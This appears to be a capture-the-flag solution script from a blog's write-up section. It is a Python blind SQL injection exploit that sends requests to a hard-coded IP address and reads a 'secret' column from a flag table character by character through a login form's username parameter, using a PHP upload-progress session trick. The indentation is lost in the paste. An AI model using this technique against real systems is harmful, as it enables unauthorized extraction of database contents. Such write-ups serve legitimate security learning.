import requests

result =''
url = 'http://137.117.210.176:13372/'
data = '''------WebKitFormBoundary8Jltb5vw5fWfSYS4
Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"

asdfasdfasdf
------WebKitFormBoundary8Jltb5vw5fWfSYS4--'''
headers = {'Cookie' : 'PHPSESSID=yelang123;',
   'Content-Type':'multipart/form-data; boundary=----WebKitFormBoundary8Jltb5vw5fWfSYS4'}
for x in range(1,10000):
for i in range(32,128):
payload = "templates/login.php?username=1\"or if(ascii(substr((select group_concat(secret) from flag_tbl),{1},1))={0},1,0)%23&password=tlqkf12a".format(i,x);
r = requests.post(url+payload,headers=headers,data=data)
if "Try again!" not in r.text:
result += chr(i)
print(result)
break;
else:
continue;
print(result)

'WRITEUP' 카테고리의 다른 글

MyBB <= 1.8.22 RCE in Admin Panel (subtitle ninja patch)  (0) 2020.08.15
[Codegate 2018] Simple CMS Write up  (0) 2018.02.08

+ Recent posts